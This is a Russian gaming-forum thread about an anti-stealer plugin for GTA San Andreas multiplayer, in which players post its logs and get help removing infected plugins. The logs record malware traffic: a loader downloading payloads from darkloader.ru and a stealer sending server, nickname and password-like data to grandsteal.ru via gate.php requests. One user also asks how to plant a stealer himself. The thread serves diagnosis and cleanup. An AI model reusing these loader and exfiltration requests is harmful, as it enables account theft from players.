Эксклюзив Неактуально Избранное ASI AntiStealer

[alex2222]

нет, сделать это нельзя и делать этого не планируется по очевидным причинам

И что это за причина такая "очевидная"?

 

[MAHEKEH]

И что это за причина такая "очевидная"?

через исключение очень легко подсунуть стиллер.

лог

[PATCHED] > [ShellExecuteA] > [C:\GTA San Andreas\lua51.dll] > {lpFile: C:\GTA San Andreas///winders.exe | lpDirectory: -}

либа или стилл
@DarkP1xel

 

[adivvkvns]

Создается файл samp.dat в папке Temp
Помоги пж. Это реально что то неизвестное науке
файл перезаписывается каждую игру
в коде находил сайт сборщик с базой данных
Я серьезно
клео.аси я менял, ставил оригинал, но имеются подозрения что этот стиллер прыгает из файла в файл
размер файла клео.аси совпадает с оригиналом

UPD: Нашел тварей этих, см. прикр. фото ниже!

|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [LoadLibraryA] > [C:\GTA SA USA EDITION\CLEO.asi] > {lpLibFileName: C:\Users\Ilya\AppData\Local\Temp\\samp.dat}
[PATCHED] > [LoadLibraryA] > [C:\GTA SA USA EDITION\CLEO.asi] > {lpLibFileName: C:\Users\Ilya\AppData\Local\Temp\\samp.dat}
[WARNING] > [URLDownloadToFileA] > [C:\GTA SA USA EDITION\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\System32\URLMON.DLL] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)}
[WARNING] > [InternetOpenA] > [C:\WINDOWS\System32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszObjectName: /moonloader/data/version-info.json}
[PATCHED] > [ZwQueueApcThread] > [C:\WINDOWS\System32\sechost.dll]
[WARNING] > [gethostbyname] > [C:\GTA SA USA EDITION\samp.dll] > {name: Ilya-ПК}
[WARNING] > [URLDownloadToFileA] > [C:\GTA SA USA EDITION\MoonLoader.asi] > {szURL: https://raw.githubusercontent.com/GORYCHsamp/reconupd/master/multiconnect.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\recon_version.json}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\System32\URLMON.DLL] > {szURL: https://raw.githubusercontent.com/GORYCHsamp/reconupd/master/multiconnect.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\recon_version.json}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszObjectName: /GORYCHsamp/reconupd/master/multiconnect.json}
[WARNING] > [InternetOpenA] > [C:\GTA SA USA EDITION\SAMPFUNCS.asi] > {lpszAgent: SAMPFUNCS v5.3.3 release #19 (SA-MP 0.3.7)}
[WARNING] > [InternetOpenUrlA] > [C:\GTA SA USA EDITION\SAMPFUNCS.asi] > {lpszUrl: http://service.blasthack.net/sf_sta...E1458321&x=B9909B053E5CD06910E320FA43440F5E5D | lpszHeaders: -}
[PATCHED] > [RtlInitUnicodeString] > [C:\WINDOWS\System32\KERNELBASE.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.dbg\*}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.dbg\*}
[PATCHED] > [RtlInitUnicodeString] > [C:\WINDOWS\System32\KERNELBASE.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.pdb\*}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.pdb\*}

 

[DarkP1xel]

Создается файл samp.dat в папке Temp
Помоги пж. Это реально что то неизвестное науке
файл перезаписывается каждую игру
в коде находил сайт сборщик с базой данных
Я серьезно
клео.аси я менял, ставил оригинал, но имеются подозрения что этот стиллер прыгает из файла в файл
размер файла клео.аси совпадает с оригиналом

UPD: Нашел тварей этих, см. прикр. фото ниже!

Удали файл: C:\Users\Ilya\AppData\Local\Temp\\samp.dat
А сам "загрузчик" стилера находится в папке CLEO.

 

[Carrentine]

Создается файл samp.dat в папке Temp
Помоги пж. Это реально что то неизвестное науке
файл перезаписывается каждую игру
в коде находил сайт сборщик с базой данных
Я серьезно
клео.аси я менял, ставил оригинал, но имеются подозрения что этот стиллер прыгает из файла в файл
размер файла клео.аси совпадает с оригиналом

UPD: Нашел тварей этих, см. прикр. фото ниже!

Про клео даркпикселя полная хуйня, нету там ничего.

 

[Aniki]

Я понял, что словил стиллер. С каждым запуском игры появляется EBALARAMA.sf и zalupa.asi. Хелп, что удалять?


|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /path.php?id=0032 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /link.php?id=0032 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /files/32_2.sf HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [InternetOpenA] > [D:\GTA\d3d9.dll] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\GTA\d3d9.dll] > {lpszUrl: https://www.dropbox.com/s/swjforlg2ofv2xj/ver.txt?dl=1 | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /files/32_3.asi HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\syswow64\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetOpenA] > [C:\Windows\syswow64\WININET.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: MICROSOFT-PC}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/OP-HaX_info.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /commands.txt HTTP/1.1

Host: grandsteal.ru

User-Agent: Logi norm i Logov toje norm



}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=1&inf=%F6%F4%E2%FB%F4%E2%FB%FB%F4%E2&stuid=0379 HTTP/1.1

Host: grandsteal.ru

User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov



}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=404&inf=/log%20pelmen&stuid=0379 HTTP/1.1

Host: grandsteal.ru

User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov



}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=404&inf=/log%20pelmen228&stuid=0379 HTTP/1.1

Host: grandsteal.ru

User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov



}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/PremiumCheck.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
Если что я пароль через ракбот уже поменял
Если что я заходил на сервер через /log и после захода в аккаунт вылетала игра
Бля, я через f3 уже нашёл два своих пароля. Но они уже изменены на другой, которого тут нету. Спасибо ракботу

на всякий случай удали все, судя по логу ты плотно говна поел аж на несколько стилеров, к тому же там лоадер мог вообще что угодно тебе грузануть

 

[Ren_Boyko]

[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}

Удаляй вот, вруби показ скрытых файлов, и удаляй скрытые файлы в SampFuncs, и в корневой

[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?

-----------------
И меняй данные от акков
Возможно ехе стиллер куки ебнули, так что торопись

 

[Ren_Boyko]

После удаления multipack.sf перестало создаваться залупа.аси. Между прочим multipack.sf был скачан с бластхака. Но не тот популярный Мунлоадер, а какой-то другой

Как бы MultiPack в luac ,а он у тебя в SF, мультипак сф это лоадер с сайта darkloader, он подгружает тебе стиллак гранда... asi, и ехе по любому , так что меняй пароли от почт, вк и тд

 

[Ren_Boyko]

[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:55:29]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:58:54]ID 1281781912, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/PremiumCheck.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:58:54]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
Меня вот это настораживает. тут 3 раза мой ник.Что удалять?Что менять?

Я посмотрел через Malwarebytes и dr web cureit. Вроде ничего ехе мне не установили

это опхак чекает твои ники там и тд, проверь все папки гта , если нет скрытого ехе, то повезло

 

[alex2222]

через исключение очень легко подсунуть стиллер.

ляяяя а как можно это сделать самому?открываю нотепадом там иероглифы

 

[Ren_Boyko]

Можешь пожалуйста последний раз посмотреть, нет ли тут ничего. Зашёл с твинка


|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[WARNING] > [InternetOpenA] > [D:\GTA\d3d9.dll] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\GTA\d3d9.dll] > {lpszUrl: https://www.dropbox.com/s/swjforlg2ofv2xj/ver.txt?dl=1 | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\syswow64\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetOpenA] > [C:\Windows\syswow64\WININET.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: MICROSOFT-PC}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
